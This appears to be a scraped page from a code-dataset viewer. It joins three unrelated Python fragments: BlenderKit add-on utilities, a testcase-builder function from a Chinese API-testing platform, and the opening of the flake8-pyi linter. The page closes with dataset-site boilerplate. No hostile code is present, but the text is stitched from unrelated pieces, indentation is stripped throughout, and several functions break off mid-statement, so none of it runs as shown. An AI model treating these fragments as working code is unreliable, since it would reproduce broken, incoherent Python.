maxx = maxy = maxz = -10000000
minx = miny = minz = 10000000
s = bpy.context.scene
obcount = 0 # calculates the mesh obs. Good for non-mesh objects
matrix_parent = parent.matrix_world
for ob in obs:
# bb=ob.bound_box
mw = ob.matrix_world
subp = ob.parent
# while parent.parent is not None:
# mw =
if ob.type == 'MESH' or ob.type == 'CURVE':
# If to_mesh() works we can use it on curves and any other ob type almost.
# disabled to_mesh for 2.8 by now, not wanting to use dependency graph yet.
mesh = ob.to_mesh(depsgraph=bpy.context.depsgraph, apply_modifiers=True, calc_undeformed=False)
# to_mesh(context.depsgraph, apply_modifiers=self.applyModifiers, calc_undeformed=False)
obcount += 1
for c in mesh.vertices:
coord = c.co
parent_coord = matrix_parent.inverted() @ mw @ Vector(
(coord[0], coord[1], coord[2])) # copy this when it works below.
minx = min(minx, parent_coord.x)
miny = min(miny, parent_coord.y)
minz = min(minz, parent_coord.z)
maxx = max(maxx, parent_coord.x)
maxy = max(maxy, parent_coord.y)
maxz = max(maxz, parent_coord.z)
# bpy.data.meshes.remove(mesh)
if obcount == 0:
minx, miny, minz, maxx, maxy, maxz = 0, 0, 0, 0, 0, 0
minx *= parent.scale.x
maxx *= parent.scale.x
miny *= parent.scale.y
maxy *= parent.scale.y
minz *= parent.scale.z
maxz *= parent.scale.z
return minx, miny, minz, maxx, maxy, maxz
def get_bounds_worldspace(obs, use_modifiers=False):
# progress('getting bounds of object(s)')
s = bpy.context.scene
maxx = maxy = maxz = -10000000
minx = miny = minz = 10000000
obcount = 0 # calculates the mesh obs. Good for non-mesh objects
for ob in obs:
# bb=ob.bound_box
mw = ob.matrix_world
if ob.type == 'MESH' or ob.type == 'CURVE':
mesh = ob.to_mesh(depsgraph=bpy.context.depsgraph, apply_modifiers=True, calc_undeformed=False)
obcount += 1
for c in mesh.vertices:
coord = c.co
world_coord = mw @ Vector((coord[0], coord[1], coord[2]))
minx = min(minx, world_coord.x)
miny = min(miny, world_coord.y)
minz = min(minz, world_coord.z)
maxx = max(maxx, world_coord.x)
maxy = max(maxy, world_coord.y)
maxz = max(maxz, world_coord.z)
if obcount == 0:
minx, miny, minz, maxx, maxy, maxz = 0, 0, 0, 0, 0, 0
return minx, miny, minz, maxx, maxy, maxz
def is_linked_asset(ob):
return ob.get('asset_data') and ob.instance_collection != None
def get_dimensions(obs):
minx, miny, minz, maxx, maxy, maxz = get_bounds_snappable(obs)
bbmin = Vector((minx, miny, minz))
bbmax = Vector((maxx, maxy, maxz))
dim = Vector((maxx - minx, maxy - miny, maxz - minz))
return dim, bbmin, bbmax
def requests_post_thread(url, json, headers):
r = requests.post(url, json=json, verify=True, headers=headers)
def get_headers(api_key):
headers = {
"accept": "application/json",
}
if api_key != '':
headers["Authorization"] = "Bearer %s" % api_key
return headers
# map uv cubic and switch of auto tex space and set it to 1,1,1
def automap(target_object=None, target_slot=None, tex_size=1, bg_exception=False):
from blenderkit import bg_blender as bg
s = bpy.context.scene
mat_props = s.blenderkit_mat
if mat_props.automap:
tob = bpy.data.objects[target_object]
# only automap mesh models
if tob.type == 'MESH':
actob = bpy.context.active_object
bpy.context.view_layer.objects.active = tob
# auto tex space
if tob.data.use_auto_texspace:
tob.data.use_auto_texspace = False
tob.data.texspace_size = (1, 1, 1)
if 'automap' not in tob.data.uv_layers:
bpy.ops.mesh.uv_texture_add()
uvl = tob.data.uv_layers[-1]
uvl.name = 'automap'
# TODO limit this to active material
# tob.data.uv_textures['automap'].active = True
scale = tob.scale.copy()
if target_slot is not None:
tob.active_material_index = | |
elif setup["name"] == "setup_wait_until_db_result_succeed":
# setup_cell = "${{setup_wait_until_db_result_succeed({0}||{1}||{2}||$DB_CONNECT)}}".format(setup["args"]["wait_time"], setup["args"]["sql"], setup["args"]["expect_value"])
# elif setup["name"] == "setup_server_upload_file":
if setup["name"] == "setup_server_upload_file":
setup_cell = "${{setup_server_upload_file({0}||{1}||{2})}}".format(setup["args"]["ssh_connect"], setup["args"]["local_path"].replace("\\", "/"), setup["args"]["remote_path"].replace("\\", "/"))
else:
if isinstance(setup["args"], dict):
func_args = ''
# for i in setup["args"]:
# if func_args == '':
# func_args += setup["args"][i]
# else:
# func_args += '||{}'.format(setup["args"][i])
for base_key in setup_hook["parameters"]:
for key, value in setup["args"].items():
if key == base_key:
if func_args == '':
func_args += value
else:
func_args += '||{}'.format(value)
elif isinstance(setup["args"], list):
func_args = "||".join(setup["args"])
else:
func_args = setup["args"]
setup_cell = "${{{func_name}({func_args})}}".format(
func_name=setup["name"], func_args=func_args)
testcase["setup_hooks"].append(setup_cell)
# teardown
# teardown_sql_count = 0
for teardown in teardown_info:
for teardown_hook in CUSTOM["teardown-hooks"]:
if teardown_hook["name"] == teardown["name"]:
# if teardown["name"] == "teardown_db_operation":
# teardown_cell = "${{teardown_db_operation({0}||$DB_CONNECT)}}".format(teardown["args"]["sql"])
# elif teardown["name"] == "teardown_wait_until_db_result_succeed":
# teardown_cell = "${{teardown_wait_until_db_result_succeed({0}||{1}||{2}||$DB_CONNECT)}}".format(teardown["args"]["wait_time"],teardown["args"]["sql"],teardown["args"]["expect_value"])
if isinstance(teardown["args"], dict):
func_args = ''
# for i in teardown["args"]:
# if func_args == '':
# func_args += teardown["args"][i]
# else:
# func_args += '||{}'.format(teardown["args"][i])
for base_key in teardown_hook["parameters"]:
for key, value in teardown["args"].items():
if key == base_key:
if func_args == '':
func_args += value
else:
func_args += '||{}'.format(value)
elif isinstance(teardown["args"], list):
func_args = "||".join(teardown["args"])
else:
func_args = teardown["args"]
teardown_cell = "${{{func_name}({func_args})}}".format(
func_name=teardown["name"], func_args=func_args)
testcase["teardown_hooks"].append(teardown_cell)
# requestTeardown
for teardown in request_teardown_info:
for teardown_hook in CUSTOM["teardown-hooks"]:
if teardown_hook["name"] == teardown["name"]:
if isinstance(teardown["args"], dict):
args_list = []
for base_key in teardown_hook["parameters"]:
for key, value in teardown["args"].items():
if key == base_key:
args_list.append(value)
break
func_args = "||".join(args_list)
elif isinstance(teardown["args"], list):
func_args = "||".join(teardown["args"])
else:
func_args = teardown["args"]
teardown_cell = "${{{func_name}({func_args})}}".format(
func_name=teardown["name"], func_args=func_args)
testcase["request_teardown_hooks"].append(teardown_cell)
# request(分为HTTP,DUBBO,MQ三种情况)
is_merge = request_info.pop("isMerge", None)
testcase["request"]["isMerge"] = True if is_merge else False
if intf_type == "HTTP":
json_body = request_info.pop("json", None)
sign_func = request_info.pop("sign", None)
empty_check_param_list = request_info.pop("emptyCheckParamList", None)
if json_body is not None:
testcase["request"]["json"] = json_body
if sign_func:
for setup_hook in CUSTOM["sign"]:
if setup_hook["name"] == sign_func:
testcase["setup_hooks"].append(
"${{{sign_func}($request||$REMOTE_HOST)}}".format(sign_func=sign_func)
)
elif intf_type == "DUBBO":
testcase["request"]["json"] = {"args": []}
dubbo_args = request_info.pop("args", None)
if dubbo_args is not None:
if isinstance(dubbo_args, list):
testcase["request"]["json"]["args"] = dubbo_args
else:
testcase["request"]["json"]["args"].append(dubbo_args)
elif intf_type == "MQ":
testcase["request"]["json"] = {"msg": "{}"}
mq_msg = request_info.pop("msg", None)
if mq_msg is not None:
testcase["request"]["json"]["msg"] = mq_msg
hr_request["teststeps"].append(testcase)
# 处理include
include = kwargs.pop("include")
if not isinstance(include, list) or include == []:
include = [{"public_variables": []}]
# include.append({"setup_cases": setup_case_list})
"""加载public_variables"""
intf_variables = re.findall(variable_regexp, str(intf_obj.intf_info))
case_variables = re.findall(variable_regexp, str(testcase))
case_variables.extend(intf_variables)
target_pv_name_list = list(set(case_variables).difference(set(env_variable_list)))
for target_pv_name in target_pv_name_list:
# todo 公共变量作用域
# system_id = ApiIntfInfoManager.get_intf(id=intf_id).api_system_id
system_id = intf_obj.api_system_id
s_var_obj = ApiPublicVariableInfoManager.get_variable(variable_name=target_pv_name, api_system_id=system_id)
if s_var_obj:
if s_var_obj.id not in include[0]["public_variables"]:
include[0]["public_variables"].append(s_var_obj.id)
else:
company_id = ApiSystemInfoManager.get_system(id=system_id).api_company_id
c_var_obj = ApiPublicVariableInfoManager.get_variable(
variable_name=target_pv_name, api_company_id=company_id)
if c_var_obj and c_var_obj.id not in include[0]["public_variables"]:
include[0]["public_variables"].append(c_var_obj.id)
"""保存必填字段校验"""
# if empty_check_params:
# empty_list = [k.strip() for k in str(empty_check_params).strip().strip(',').split(',')]
# include.append({"param_check": {"empty": empty_list}})
if empty_check_param_list:
include.append({"param_check": {"empty": empty_check_param_list}})
# request = change_variable_format(request)
if action == 'add':
ApiTestcaseInfoManager.insert_testcase(
testcase_name=testcase_name,
type=testcase_type,
include=json_dumps(include),
simple_desc=simple_desc,
case_status=0,
api_intf_id=intf_id,
creator=operator,
last_modifier=operator,
expect_result=expect_result,
setup_case_list=json_dumps(setup_cases_list),
last_modify_time=datetime.now(),
)
tc_objs = ApiTestcaseInfoManager.get_testcases_order_by_create_time_desc(
api_intf_id=intf_id, testcase_name=testcase_name, creator=operator, expect_result=expect_result)
if not tc_objs:
logger.error("tc_objs not found")
raise LoadCaseError
else:
testcase_id = tc_objs[0].id
ApiTestcaseRequestManager.insert_request(
api_testcase_id=testcase_id,
request=json_dumps(hr_request),
)
# tcr_obj = ApiTestcaseRequestManager.get_request(api_testcase_id=testcase_id)
# if not tcr_obj:
# logger.error("tcr_obj not found")
# raise LoadCaseError
# else:
# request_id = tcr_obj.id
# ApiTestcaseInfoManager.update_testcase(
# id_=testcase_id,
# api_request_id=request_id,
# )
set_testcase_tag(testcase_id, tag_id_list)
elif action == 'edit':
testcase_id = base.pop("testcaseId")
ApiTestcaseInfoManager.update_testcase(
id_=testcase_id,
testcase_name=testcase_name,
include=json_dumps(include),
simple_desc=simple_desc,
last_modifier=operator,
expect_result=expect_result,
setup_case_list=json_dumps(setup_cases_list),
last_modify_time=datetime.now(),
)
r_obj = ApiTestcaseRequestManager.get_request(api_testcase_id=testcase_id)
ApiTestcaseRequestManager.update_request(
id_=r_obj.id,
request=json_dumps(hr_request),
)
set_testcase_tag(testcase_id, tag_id_list)
# print(json_dumps(hr_request))
def handle_api_testcase_main(action, **kwargs):
"""
新版-保存主测试用例到数据库
:param action:
:param kwargs:
:return:
"""
# 处理base
base = kwargs.pop("base")
tag_id_list = base.pop("tagIdList")
base_intf_id = base.pop("intfId", None)
product_line_id = base.pop("productLineId", None)
main_teardown_info = base.pop("mainTeardownInfo", [])
case_type = base.pop("caseType", 0)
if product_line_id and case_type != 1:
case_type = 2
testcase_name = base.pop("testcaseName")[:200]
simple_desc = base.pop("testcaseDesc", "")[:1000]
expect_result = base.pop("expectResult")[:200]
else:
case_type = 1
# 处理main_teardown_hooks
main_teardown_hooks = []
for teardown in main_teardown_info:
for teardown_hook in CUSTOM["teardown-hooks"]:
if teardown_hook["name"] == teardown["name"]:
if isinstance(teardown["args"], dict):
func_args = ''
for i in teardown["args"]:
if func_args == '':
func_args += teardown["args"][i]
else:
func_args += '||{}'.format(teardown["args"][i])
elif isinstance(teardown["args"], list):
func_args = "||".join(teardown["args"])
else:
func_args = teardown["args"]
teardown_cell = "${{{func_name}({func_args})}}".format(
func_name=teardown["name"], func_args=func_args)
main_teardown_hooks.append(teardown_cell)
# 处理setup_flow
setup_flow = kwargs.pop("setupFlow", None)
if setup_flow:
setup_flow_list = [int(flow_dic["flowCaseId"]) for flow_dic in setup_flow]
else:
setup_flow_list = []
operator = kwargs.pop("userName")
sub_info_list = []
# 处理steps
steps = kwargs.pop("steps")
step_no = 0
# empty_check_params = None
empty_check_param_list = None
for step in steps:
sub_info = {}
step_no += 1
sub_base = step.pop("base")
# 判断是否为引用的子用例
is_referenced_sub = True if not step else False
if is_referenced_sub:
sub_info["sub_id"] = sub_base["subId"]
else:
setup_info = step.pop("setupInfo")
variable_info = step.pop("variableInfo")
request_info = step.pop("requestInfo")
validate_info = step.pop("validateInfo")
extract_info = step.pop("extractInfo")
teardown_info = step.pop("teardownInfo")
request_teardown_info = step.pop("requestTeardownInfo", [])
sub_name = sub_base["subName"][:200]
sub_info["sub_name"] = sub_name
intf_id = sub_base["intfId"] if case_type == 2 else base_intf_id
intf_obj = ApiIntfInfoManager.get_intf(id=intf_id)
intf_type = intf_obj.intf_type
sub_info["request_type"] = map_testcase_type_to_number(intf_type)
sub_info["simple_desc"] = sub_base.get("subDesc", "")[:1000]
sub_info["expect_result"] = sub_base["subExpectResult"][:200]
sub_info["case_type"] = case_type
sub_info["api_intf_id"] = intf_id
if "subId" in sub_base:
sub_info["sub_id"] = sub_base["subId"]
else:
sub_info["sub_id"] = None
hr_request = {
"name": sub_name,
"config": {
"variables": [],
"request": {
"base_url": "",
}
},
"teststeps": []
}
testcase = {
"name": sub_name,
"variables": [],
"request": {},
"validate": [],
"extract": [],
"setup_hooks": [],
"teardown_hooks": [],
"request_teardown_hooks": []
}
# variable
for variable in variable_info:
# 自定义函数
if variable["type"] == "function":
func_args = ''
input_args_dic = variable["args"]
for custom_func in CUSTOM["functions"]:
if custom_func["name"] == variable["value"]:
for x in custom_func["parameters"]:
for input_arg in input_args_dic:
if input_arg == x:
if func_args == '':
func_args += input_args_dic[input_arg]
else:
func_args += '||{}'.format(input_args_dic[input_arg])
testcase["variables"].append({
variable["name"].strip(): "${{{func}({args})}}".format(func=variable["value"], args=func_args)
})
# 数据库
elif variable["type"] == "db":
"""
从
{
"type": "db",
"name": "next_member_id",
"value": "SELECT NEXT_VALUE FROM user_db.sequence WHERE SEQ_NAME='MEMBER_ID';",
"args": {}
}
变换成
{
'next_member_id': '${variable_db_operation(SELECT NEXT_VALUE FROM user_db.sequence WHERE SEQ_NAME=\'MEMBER_ID\';||$DB_CONNECT)}'
},
"""
sql = variable["value"]
default_func = 'variable_db_operation'
testcase["variables"].append({
variable["name"].strip(): "${{{func}({sql}||$DB_CONNECT)}}".format(func=default_func, sql=sql)
})
# key-value
else:
actual_var_value = transfer_to_actual_value(variable)
testcase["variables"].append({
variable["name"].strip(): actual_var_value
})
# validate
for validate in validate_info:
if validate["comparator"] == "db_validate":
validate["check"] += "$DB_CONNECT"
# '''替换validate["expect"]的中文冒号'''
# if ":" in validate["expect"]:
# validate["expect"] = validate["expect"].replace(":", ":")
testcase["validate"].append({
validate["comparator"]: [
validate["check"].strip(), validate["expect"], validate["comment"]
]
})
# extract
for extract in extract_info:
testcase["extract"].append({
extract["saveAs"].strip(): extract["check"]
})
# setup
case_step_count = 0
for setup in setup_info:
'''遇到前置执行用例,跳过'''
if setup["name"] == "execution_testcase":
continue
for setup_hook in CUSTOM["setup-hooks"]:
if setup_hook["name"] == setup["name"]:
if setup["name"] == "setup_db_operation":
setup_cell = "${{setup_db_operation({0}||$DB_CONNECT)}}".format(setup["args"]["sql"])
elif setup["name"] == "setup_wait_until_db_result_succeed":
setup_cell = "${{setup_wait_until_db_result_succeed({0}||{1}||{2}||$DB_CONNECT)}}".format(setup["args"]["wait_time"], setup["args"]["sql"], setup["args"]["expect_value"])
elif setup["name"] == "setup_server_upload_file":
setup_cell = "${{setup_server_upload_file({0}||{1}||{2})}}".format(setup["args"]["ssh_connect"], setup["args"]["local_path"].replace("\\", "/"), setup["args"]["remote_path"].replace("\\", "/"))
else:
if isinstance(setup["args"], dict):
func_args = ''
# for i in setup["args"]:
# if func_args == '':
# func_args += setup["args"][i]
# else:
# func_args += '||{}'.format(setup["args"][i])
for base_key in setup_hook["parameters"]:
for key, value in setup["args"].items():
if key == base_key:
if func_args == '':
func_args += value
else:
func_args += '||{}'.format(value)
elif isinstance(setup["args"], list):
func_args = "||".join(setup["args"])
else:
func_args = setup["args"]
setup_cell = "${{{func_name}({func_args})}}".format(
func_name=setup["name"], func_args=func_args)
testcase["setup_hooks"].append(setup_cell)
# teardown
# teardown_sql_count = 0
for teardown in teardown_info:
for teardown_hook in CUSTOM["teardown-hooks"]:
if teardown_hook["name"] == teardown["name"]:
if teardown["name"] == "teardown_db_operation":
teardown_cell = "${{teardown_db_operation({0}||$DB_CONNECT)}}".format(teardown["args"]["sql"])
elif teardown["name"] == "teardown_wait_until_db_result_succeed":
teardown_cell = "${{teardown_wait_until_db_result_succeed({0}||{1}||{2}||$DB_CONNECT)}}".format(teardown["args"]["wait_time"],teardown["args"]["sql"],teardown["args"]["expect_value"])
else:
if isinstance(teardown["args"], dict):
func_args = ''
# for i in teardown["args"]:
# if func_args == '':
# func_args += teardown["args"][i]
# else:
# func_args += '||{}'.format(teardown["args"][i])
for base_key in teardown_hook["parameters"]:
for key, value in teardown["args"].items():
if key == base_key:
if func_args == '':
func_args += value
else:
func_args += '||{}'.format(value)
elif isinstance(teardown["args"], list):
func_args = "||".join(teardown["args"])
else:
func_args = teardown["args"]
teardown_cell = "${{{func_name}({func_args})}}".format(
func_name=teardown["name"], func_args=func_args)
testcase["teardown_hooks"].append(teardown_cell)
# requestTeardown
for teardown in request_teardown_info:
for teardown_hook in CUSTOM["teardown-hooks"]:
if teardown_hook["name"] == teardown["name"]:
if isinstance(teardown["args"], dict):
args_list = []
for base_key in teardown_hook["parameters"]:
for key, value in teardown["args"].items():
if key == base_key:
args_list.append(value)
break
func_args = "||".join(args_list)
elif isinstance(teardown["args"], list):
func_args = "||".join(teardown["args"])
else:
func_args = teardown["args"]
teardown_cell = "${{{func_name}({func_args})}}".format(
func_name=teardown["name"], func_args=func_args)
testcase["request_teardown_hooks"].append(teardown_cell)
# request(分为HTTP,DUBBO,MQ三种情况)
is_merge = request_info.pop("isMerge", None)
testcase["request"]["isMerge"] = True if is_merge else False
if intf_type == "HTTP":
json_body = request_info.pop("json", None)
sign_func = request_info.pop("sign", None)
| |
<reponame>KotlinIsland/flake8-pyi<gh_stars>0
#!/usr/bin/env python3
from __future__ import annotations
import argparse
import ast
import logging
import optparse
import re
import sys
from collections import Counter
from collections.abc import Iterable, Iterator, Sequence
from contextlib import contextmanager
from copy import deepcopy
from dataclasses import dataclass, field
from itertools import chain
from pathlib import Path
from typing import ClassVar, NamedTuple
from flake8 import checker # type: ignore
from flake8.plugins.pyflakes import FlakesChecker # type: ignore
from pyflakes.checker import ( # type: ignore[import]
PY2,
ClassDefinition,
ClassScope,
FunctionScope,
ModuleScope,
)
if sys.version_info >= (3, 9):
from ast import unparse
else:
from ast_decompiler import decompile as unparse
__version__ = "20.10.0"
LOG = logging.getLogger("flake8.pyi")
class Error(NamedTuple):
lineno: int
col: int
message: str
type: type
class TypeVarInfo(NamedTuple):
cls_name: str
name: str
# ChainMap and AsyncContextManager do not exist in typing or typing_extensions in Python 2,
# so we can disallow importing them from anywhere except collections and contextlib respectively.
_BAD_Y022_IMPORTS = {
# typing aliases for collections
"typing.Counter": "collections.Counter",
"typing.Deque": "collections.deque",
"typing.DefaultDict": "collections.defaultdict",
"typing.ChainMap": "collections.ChainMap",
# typing aliases for builtins
"typing.Dict": "builtins.dict",
"typing.FrozenSet": "builtins.frozenset",
"typing.List": "builtins.list",
"typing.Set": "builtins.set",
"typing.Tuple": "builtins.tuple",
"typing.Type": "builtins.type",
# One typing alias for contextlib
"typing.AsyncContextManager": "contextlib.AbstractAsyncContextManager",
# typing_extensions aliases for collections
"typing_extensions.Counter": "collections.Counter",
"typing_extensions.Deque": "collections.deque",
"typing_extensions.DefaultDict": "collections.defaultdict",
"typing_extensions.ChainMap": "collections.ChainMap",
# One typing_extensions alias for a builtin
"typing_extensions.Type": "builtins.type",
# one typing_extensions alias for contextlib
"typing_extensions.AsyncContextManager": "contextlib.AbstractAsyncContextManager",
}
# typing_extensions.ContextManager is omitted from the Y023 and Y027 collections - special-cased
_BAD_Y023_IMPORTS = frozenset(
{
# collections.abc aliases
"Awaitable",
"Coroutine",
"AsyncIterable",
"AsyncIterator",
"AsyncGenerator",
# typing aliases
"Protocol",
"runtime_checkable",
"ClassVar",
"NewType",
"overload",
"Text",
"NoReturn",
}
)
_BAD_Y027_IMPORTS = {
"typing.ContextManager": "contextlib.AbstractContextManager",
"typing.OrderedDict": "collections.OrderedDict",
"typing_extensions.OrderedDict": "collections.OrderedDict",
}
class PyiAwareFlakesChecker(FlakesChecker):
def deferHandleNode(self, node, parent):
self.deferFunction(lambda: self.handleNode(node, parent))
def ASSIGN(self, node):
"""This is a custom implementation of ASSIGN derived from
handleChildren() in pyflakes 1.3.0.
The point here is that on module level, there's type aliases that we
want to bind eagerly, but defer computation of the values of the
assignments (the type aliases might have forward references).
"""
if not isinstance(self.scope, ModuleScope):
return super().ASSIGN(node)
for target in node.targets:
self.handleNode(target, node)
self.deferHandleNode(node.value, node)
def ANNASSIGN(self, node):
"""
Annotated assignments don't have annotations evaluated on function
scope, hence the custom implementation. Compared to the pyflakes
version, we defer evaluation of the annotations (and values on
module level).
"""
if node.value:
# Only bind the *target* if the assignment has value.
# Otherwise it's not really ast.Store and shouldn't silence
# UndefinedLocal warnings.
self.handleNode(node.target, node)
if not isinstance(self.scope, FunctionScope):
self.deferHandleNode(node.annotation, node)
if node.value:
# If the assignment has value, handle the *value*...
if isinstance(self.scope, ModuleScope):
# ...later (if module scope).
self.deferHandleNode(node.value, node)
else:
# ...now.
self.handleNode(node.value, node)
def LAMBDA(self, node):
"""This is likely very brittle, currently works for pyflakes 1.3.0.
Deferring annotation handling depends on the fact that during calls
to LAMBDA visiting the function's body is already deferred and the
only eager calls to `handleNode` are for annotations.
"""
self.handleNode, self.deferHandleNode = self.deferHandleNode, self.handleNode
super().LAMBDA(node)
self.handleNode, self.deferHandleNode = self.deferHandleNode, self.handleNode
def CLASSDEF(self, node):
if not isinstance(self.scope, ModuleScope):
# This shouldn't be necessary because .pyi files don't nest
# scopes much, but better safe than sorry.
return super().CLASSDEF(node)
# What follows is copied from pyflakes 1.3.0. The only changes are the
# deferHandleNode calls.
for decorator in node.decorator_list:
self.handleNode(decorator, node)
for baseNode in node.bases:
self.deferHandleNode(baseNode, node)
if not PY2:
for keywordNode in node.keywords:
self.deferHandleNode(keywordNode, node)
self.pushScope(ClassScope)
# doctest does not process doctest within a doctest
# classes within classes are processed.
if (
self.withDoctest
and not self._in_doctest()
and not isinstance(self.scope, FunctionScope)
):
self.deferFunction(lambda: self.handleDoctests(node))
for stmt in node.body:
self.handleNode(stmt, node)
self.popScope()
self.addBinding(node, ClassDefinition(node.name, node))
def handleNodeDelete(self, node):
"""Null implementation.
Lets users use `del` in stubs to denote private names.
"""
return
class PyiAwareFileChecker(checker.FileChecker):
def run_check(self, plugin, **kwargs):
if self.filename == "-":
filename = self.options.stdin_display_name
else:
filename = self.filename
if filename.endswith(".pyi") and plugin["plugin"] == FlakesChecker:
LOG.info(
"Replacing FlakesChecker with PyiAwareFlakesChecker while "
"checking %r",
filename,
)
plugin = dict(plugin)
plugin["plugin"] = PyiAwareFlakesChecker
return super().run_check(plugin, **kwargs)
class LegacyNormalizer(ast.NodeTransformer):
"""Transform AST to be consistent across Python versions."""
if sys.version_info < (3, 9):
def visit_Index(self, node: ast.Index) -> ast.expr:
"""Index nodes no longer exist in Python 3.9.
For example, consider the AST representing Union[str, int].
Before 3.9: Subscript(value=Name(id='Union'), slice=Index(value=Tuple(...)))
3.9 and newer: Subscript(value=Name(id='Union'), slice=Tuple(...))
"""
return node.value
@dataclass
class PyiVisitor(ast.NodeVisitor):
filename: Path = Path("(none)")
errors: list[Error] = field(default_factory=list)
# Mapping of all private TypeVars/ParamSpecs/TypeVarTuples to the nodes where they're defined
typevarlike_defs: dict[TypeVarInfo, ast.Assign] = field(default_factory=dict)
# Mapping of each name in the file to the no. of occurrences
all_name_occurrences: Counter[str] = field(default_factory=Counter)
_class_nesting: int = 0
_function_nesting: int = 0
_allow_string_literals: int = 0
@contextmanager
def allow_string_literals(self) -> Iterator[None]:
"""Context manager that indicates that string literals should be allowed."""
self._allow_string_literals += 1
try:
yield
finally:
self._allow_string_literals -= 1
@property
def string_literals_allowed(self) -> bool:
"""Determine whether string literals should currently be allowed."""
return bool(self._allow_string_literals)
@property
def in_function(self) -> bool:
"""Determine whether we are inside a `def` statement"""
return bool(self._function_nesting)
@property
def in_class(self) -> bool:
"""Determine whether we are inside a `class` statement"""
return bool(self._class_nesting)
def _check_import_or_attribute(
self, node: ast.Attribute | ast.ImportFrom, module_name: str, object_name: str
) -> None:
fullname = f"{module_name}.{object_name}"
# Y022 errors
if fullname in _BAD_Y022_IMPORTS:
error_message = Y022.format(
good_cls_name=f'"{_BAD_Y022_IMPORTS[fullname]}"',
bad_cls_alias=fullname,
)
# Y027 errors
elif fullname in _BAD_Y027_IMPORTS:
error_message = Y027.format(
good_cls_name=f'"{_BAD_Y027_IMPORTS[fullname]}"',
bad_cls_alias=fullname,
)
# Y023 errors
elif module_name == "typing_extensions":
if object_name in _BAD_Y023_IMPORTS:
error_message = Y023.format(
good_cls_name=f'"typing.{object_name}"',
bad_cls_alias=f"typing_extensions.{object_name}",
)
elif object_name == "ContextManager":
suggested_syntax = (
'"contextlib.AbstractContextManager" '
'(or "typing.ContextManager" in Python 2-compatible code)'
)
error_message = Y023.format(
good_cls_name=suggested_syntax,
bad_cls_alias="typing_extensions.ContextManager",
)
else:
return
# Y024 errors
elif fullname == "collections.namedtuple":
error_message = Y024
else:
return
self.error(node, error_message)
def visit_Attribute(self, node: ast.Attribute) -> None:
self.generic_visit(node)
thing = node.value
if not isinstance(thing, ast.Name):
return
self._check_import_or_attribute(
node=node, module_name=thing.id, object_name=node.attr
)
def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
module_name, imported_objects = node.module, node.names
if module_name is None:
return
if module_name == "collections.abc" and any(
obj.name == "Set" and obj.asname != "AbstractSet"
for obj in imported_objects
):
return self.error(node, Y025)
for obj in imported_objects:
self._check_import_or_attribute(
node=node, module_name=module_name, object_name=obj.name
)
def visit_Assign(self, node: ast.Assign) -> None:
if self.in_function:
# We error for unexpected things within functions separately.
self.generic_visit(node)
return
if len(node.targets) == 1:
target = node.targets[0]
if isinstance(target, ast.Name):
target_name = target.id
else:
self.error(node, Y017)
target_name = None
else:
self.error(node, Y017)
target_name = None
if target_name == "__all__":
with self.allow_string_literals():
self.generic_visit(node)
else:
self.generic_visit(node)
if target_name is None:
return
assignment = node.value
# Attempt to find assignments to type helpers (typevars and aliases),
# which should usually be private. If they are private,
# they should be used at least once in the file in which they are defined.
if isinstance(assignment, ast.Call) and isinstance(assignment.func, ast.Name):
cls_name = assignment.func.id
if cls_name in ("TypeVar", "ParamSpec", "TypeVarTuple"):
if target_name.startswith("_"):
target_info = TypeVarInfo(cls_name=cls_name, name=target_name)
self.typevarlike_defs[target_info] = node
else:
self.error(target, Y001.format(cls_name))
if isinstance(node.value, (ast.Num, ast.Str, ast.Bytes)):
self.error(node.value, Y015)
# We avoid triggering Y026 for calls and = ... because there are various
# unusual cases where assignment to the result of a call is legitimate
# in stubs.
elif target_name != "__all__" and not isinstance(
node.value, (ast.Ellipsis, ast.Call)
):
self.error(node, Y026)
def visit_Name(self, node: ast.Name) -> None:
self.all_name_occurrences[node.id] += 1
def visit_Call(self, node: ast.Call) -> None:
function = node.func
self.visit(function)
if isinstance(function, ast.Name):
if function.id == "NamedTuple":
return self.error(node, Y028)
elif isinstance(function, ast.Attribute):
if (
isinstance(function.value, ast.Name)
and function.value.id == "typing"
and function.attr == "NamedTuple"
):
return self.error(node, Y028)
# String literals can appear in positional arguments for
# TypeVar definitions.
with self.allow_string_literals():
for arg in node.args:
self.visit(arg)
# But in keyword arguments they're most likely TypeVar bounds,
# which should not be quoted.
for kw in node.keywords:
self.visit(kw)
# 3.8+
def visit_Constant(self, node: ast.Constant) -> None:
if not self.string_literals_allowed and isinstance(node.value, str):
self.error(node, Y020)
# 3.7 and lower
def visit_Str(self, node: ast.Str) -> None:
if not self.string_literals_allowed:
self.error(node, Y020)
def visit_Expr(self, node: ast.Expr) -> None:
if isinstance(node.value, ast.Str):
self.error(node, Y021)
else:
self.generic_visit(node)
def visit_AnnAssign(self, node: ast.AnnAssign) -> None:
self.generic_visit(node)
if isinstance(node.annotation, ast.Name) and node.annotation.id == "TypeAlias":
return
if node.value and not isinstance(node.value, ast.Ellipsis):
self.error(node.value, Y015)
def _check_union_members(self, members: |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.